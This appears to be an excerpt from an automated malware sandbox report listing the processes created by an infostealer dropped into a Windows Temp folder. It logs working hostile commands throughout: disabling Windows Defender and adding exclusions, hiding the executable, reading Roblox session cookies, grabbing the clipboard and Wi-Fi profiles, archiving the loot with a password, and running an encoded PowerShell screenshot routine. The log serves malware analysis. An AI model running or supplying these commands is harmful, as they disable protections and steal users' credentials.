                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
